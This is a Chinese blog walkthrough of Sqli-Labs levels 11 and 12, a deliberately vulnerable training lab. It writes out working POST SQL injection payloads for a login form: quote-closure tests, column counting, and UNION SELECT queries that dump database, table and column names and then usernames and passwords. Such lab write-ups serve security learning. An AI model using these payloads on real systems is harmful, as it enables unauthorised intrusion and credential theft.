Less-11-12 【‘、“)】

最新推荐文章于 2024-05-04 21:30:01 发布
最新推荐文章于 2024-05-04 21:30:01 发布
阅读量275 收藏
点赞数
分类专栏: Sqli-Labs 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45939134/article/details/130780875
版权
该文详细描述了通过SQL注入技术进行的一系列测试步骤,从发现注入点,判断字段数,到查询数据库信息,直至获取特定表和字段的内容。主要涉及单引号和双引号闭合方式的注入方法,并展示了如何通过错误信息来推进攻击过程。
摘要由CSDN通过智能技术生成

目录

第十一、十二关

1、在账号密码输入admin,查看成功效果。

2、输入错误的账号密码,查看错误效果。

3、找注入点,我们尝试在账户的输入框中加单引号,发现出现报错。

4、加注释,查看页面是否恢复正常,可以看到页面成功执行了,证明当前网址存在单引号注入问题。

5、判断字段数

6、找寻字段回显位置

7、查询所有数据库的名称

8、查询当前数据库的名称

9、查询security数据库下的所有数据

10、查询security数据库中users数据表中的所有字段

11、查询users数据表中username字段和password字段下的内容

12、显示字段中单个内容

第十二关

1、找寻注入点

2、根据报错的信息,我们发现它是由")的闭合方式,我们加注释查看页面是否成功执行。

3、接下来的步骤就跟11关一样,只是单引号变成了")

第十一、十二关

三个页面:成功页面、错误页面、报错页面

1、在账号密码输入admin,查看成功效果。

2、输入错误的账号密码,查看错误效果。

3、找注入点,我们尝试在账户的输入框中加单引号,发现出现报错。

4、加注释,查看页面是否恢复正常,可以看到页面成功执行了,证明当前网址存在单引号注入问题。

admin' -- +

5、判断字段数

admin' and 1=2 order by 3 -- +

admin' and 1=2 order by 2 -- +

通过以上信息我们可以知道它的字段数为2

6、找寻字段回显位置

admin' and 1=2 union select 1,2 -- +

7、查询所有数据库的名称

admin' and 1=2 union select 1,binary(group_concat(schema_name)) from information_schema.schemata -- +

8、查询当前数据库的名称

admin' and 1=2 union select 1,database() -- +

9、查询security数据库下的所有数据

admin' and 1=2 union select 1,binary(group_concat(table_name)) from information_schema.tables where table_schema="security" -- +

10、查询security数据库中users数据表中的所有字段

admin' and 1=2 union select 1,binary(group_concat(column_name)) from information_schema.columns where table_schema='security' and table_name='users' -- +

11、查询users数据表中username字段和password字段下的内容

admin' and 1=2 union select binary(group_concat(username)),binary(group_concat(password)) from users -- +

12、显示字段中单个内容

如果要查看下一个就 limit 1,1       

limit  0,1    从第0位开始往后1位的内容(不包括0)

admin' and 1=2 union select username,password from users limit 0,1 -- +

到此闯关完成,闯关结束。

第十二关

1、找寻注入点

在Username后的文本框中输入admin'发现没有报错,当我们输入双引号的时候发现提示报错

2、根据报错的信息,我们发现它是由")的闭合方式,我们加注释查看页面是否成功执行。

admin") -- +

3、接下来的步骤就跟11关一样,只是单引号变成了")

到此闯关完成,闯关结束。

'tubug'
关注
专栏目录
sqli-labs less-11 & less-12
water0diamond的博客
03-17 918
POST-Error Based-Single quotes-String (基于错误的POST单引号字符型注入) Less-11 POST-Error Based-Double quotes-String-with twist (基于错误的双引号POST型字符型变形的注入)Less-12 前面10关都是get型的,而从现在开始我们进入post型关卡 post是一种数据提...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1408
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
SQLi LABS Less-12 联合注入+报错注入
热门推荐
wangyuxiang946的博客
06-21 1万+
sqli第十二关,sqli-labs less-12,sqlilabs less12
sqli-labs:Less 11~20 通关详解
qq_45756971的博客
10-27 572
第十一关: 看到登录框,先使用弱口令进行尝试,登录成功 输入单引号尝试引起报错 猜测后台语句为: select * from where username=‘username’ and password=’$password’ 接下来使用布尔注入,这里使用or 1=1永真句可以将所有查找结果输出 判断列数 成功查找到信息 第十二关 输入单引号没有引起报错,尝试输入双引号,报错信息很多,直接看到了后台的语句 这里根据报错信息,使用双引号加括号闭合 第十三关 通过报错信息可以构造如下的闭合方式 这一关同
linux json 写sql注入,sql注入之json注入(php代码)
weixin_31716637的博客
05-19 768
环境phpstudyphp服务端代码security数据库中的users中的username,password字段用户名adminJSON服务端代码大家实际测试中注意修改相关的数据库名、名、字段名等// php防止中文乱码header(‘content-type:text/html;charset=utf-8‘);if(isset($_POST[‘json‘])){$json_str=$_PO...
Less-20 【cookie】
tubug的博客
05-21 410
切换到浏览器我们输入账号密码然后点击Submit,然后我们打开BP就会发现已经抓取的HTTP请求包。我们按以下Ctrl+R键,然后点击Repeater查看我们传送过来的请求包。limit 0,1 从第0位开始往后1位的内容(不包括0)既然前两关在文本框中找不到注入点,那这一关我们尝试新的方法。在之后的http请求包中,我们发现了Cookie有关键信息。我们查看一整个流程,点击Forward(放包)分析它的HTTP请求包来进行攻击。然后加注释,查看页面是否恢复正常。由以上得知字段数为3。
【SQLi-LABS】Less -11 注入思路以及过程
m0_52513952的博客
02-22 3201
less 11 是 sqli-labs 的第一道 POST 型注入题,因此,我们不能再用之前 GET 型注入的方法,在搜索框进行注入,而是要在输入框里面完成注入。下面的注入流程是基于nliuc师傅的视频教程实现的。
less和less-loader自己用的对应关系
lyclyc_的博客
05-30 1969
【代码】less和less-loader自己用的对应关系。
vue安装less-loader报错
wzt_WZT的博客
09-13 1420
之前安装less-loader报错,一直以为是版本原因,之后试了好多低版本,发现还是安装失败,最后发现是由于npm权限原因。
Sqli-labs之Less-11和Less-12
→_→
04-02 1760
Less-11 POST - 基于错误的- 单引号- 字符型 LOGIN ATTEMPT FAILED 登录尝试失败 从这一关的提示当中我们知道这是一个post类型的,那么post与ge...
SQL注入-HTTP头部注入
Snowflake1997的博客
02-19 1511
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-11。访问的URL为: http://[靶机IP]/sqli-labs/Less-18/ 利用Burpsuite工具抓包 启动Burpsuite 在攻击机Pentest-Atk的桌面文件夹Burp中,打开Burpsuite程序 设置Burpsuite的代理服务端口 在Burpsuite软件界面上选择选项卡“Proxy”->”Opt
SQL注入-基础知识
m0_72210904的博客
05-04 1116
网络安全领域中,sql注入是一个无法被忽视的关键点,曾经多少的网站都因此被攻破,直到现在很多网站依旧存在很多sql注入的漏洞和风险点。Sql注入的原理简单,但变化和危害特别严重,属于“上有政策,下有对策”的风险点,也是从事渗透攻防必不可少的一个知识点。本人因近期学习渗透测试相关内容,特此记录学习过程中的笔记,若你也是刚入门渗透安全,或许会有帮助,也希望可以一起交流。我本次所有的sql注入笔记都基于sqli-labs靶场进行演示,链接如何安装sqli-labs靶场。
sqli-labs(1-10关)
剁椒鱼头没剁椒的博客
10-06 1435
Less-1   测试流程   1.测试注入点   注意:后续的流程和第一关一样,可以直接复制第一关命令进行测试。   注意:后续的流程和第一关一样,可以直接复制第一关命令进行测试。   注意:后续的流程和第一关一样,可以直接复制第一关命令进行测试。?id=1’ and 1=2–+ 通过文章开头的多种字段类型进行测试发现’ 能够闭合。 通过测试发现第五关属于字符型型注入。   注:这里若是不了解什么是布尔盲注可以CSDN上搜索。   或者使用ascii函数
Sqli-labs靶场详细攻略Less 11-16
qq_41755084的博客
10-11 647
这一关页面发生了变化,开始使用post方法传递参数。在Username字段输入1',查看错误信息。错误信息中发现password字段,基本可以确认这两个字段在同一个sql语句中联合查询。使用order by注入测试返回的参数为几列。测试到3时报错,证明返回两列。注意,这里的注释使用的是--(两个减号一个空格),而不是之前的--+。之前也提到使用加号是因为在某些http实现时会将加号转变为空格。这里使用#进行注释也是一样的。使用union select注入查询数据库名,数据库名。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Java语言编程基础及Web开发入门教程:Java 是一种广泛使用的面向对象编程语言,以其平台无关性和安全性著称 Java 不仅
最新发布
09-15
javascript:Java 是一种广泛使用的面向对象编程语言,以其平台无关性和安全性著称。Java 不仅适用于桌面应用程序开发,还特别适合 Web 开发,包括服务器端开发、Android 应用开发等。下面是一个简要的 Java 编程基础和 Web 开发入门指南。 Java 编程基础 1. 环境搭建 首先需要安装 Java 开发工具包 JDK 和一个集成开发环境(IDE),比如 Eclipse 或 IntelliJ IDEA。 2. 第一个 Java 程序 创建一个简单的 Java 程序来熟悉 Java 的基本语法结构。 java 深色版本 1public class HelloWorld {2 public static void main(String[] args) {3 System.out.println("Hello, World!");4 }5} 3. 数据类型 Java 支持多种数据类型,包括基本类型(如 int, double)和引用类型(如 String, 类)。 4. 控制结构 学习条件语句(if, switch)、循环语句(for,
5345-微信小程序校园二手交易平台小程序(源码+数据库).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
基于 Flask 和 MongoDB 的任务管理项目.zip
09-15
这是一个使用 Flas、kmongoDB 和 Python 后端技术构建的任务管理项目。该项目允许用户创建个人资料,将任务插入数据库并进行编辑。它采用防御性编程来限制用户的权限。项目还使用了 JavaScript、HTML 和 Materialize 框架来进行前端开发和样式设计。管理员可以使用'admin'作为用户名和密码登录,以访问网站的所有功能。这是一个完整的全栈项目,涵盖了前端和后端的开发。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
5104-微信小程序小说实体书商城+ssm(源码+数据库+lun文).zip
09-15
本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。本系统主要针对计算机相关专业的正在做毕业设计的学生和需要项目实战练习的学习者,可作为毕业设计、课程设计、期末大作业。
ERROR Failed to compile with 1 error 17:36:52 Failed to resolve loader: less-loader You may need to install it. ERROR in ./src/views/Login.vue 4:0-90 Module not found: Error: Can't resolve 'less-loader' in 'D:\Personal_Files\VSCode\Ego商城后台管理系统\code\vue-ego' @ ./src/router/index.js 42:19-47 @ ./src/main.js 4:0-30 11:2-8 webpack compiled with 1 error
06-10
这个错误提示是在编译过程中,无法找到 less-loader 这个 loader。请检查一下您的项目中是否已经安装了 less-loader,如果没有安装,可以通过以下命令进行安装: ``` npm install less-loader --save-dev ``` 如果已经安装了,可以检查一下您的 webpack 配置文件,看看是否正确配置了 less-loader。具体可以参考以下配置: ``` module: { rules: [ { test: /\.less$/, use: [ 'style-loader', 'css-loader', 'less-loader' ] } ] } ``` 另外,如果您使用的是 Vue CLI 创建的项目,也可以在项目根目录下的 vue.config.js 文件中进行配置,具体可以参考以下配置: ``` module.exports = { chainWebpack: config => { config.module .rule('less') .test(/\.less$/) .use('less-loader') .loader('less-loader') .end() } } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

'tubug'

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值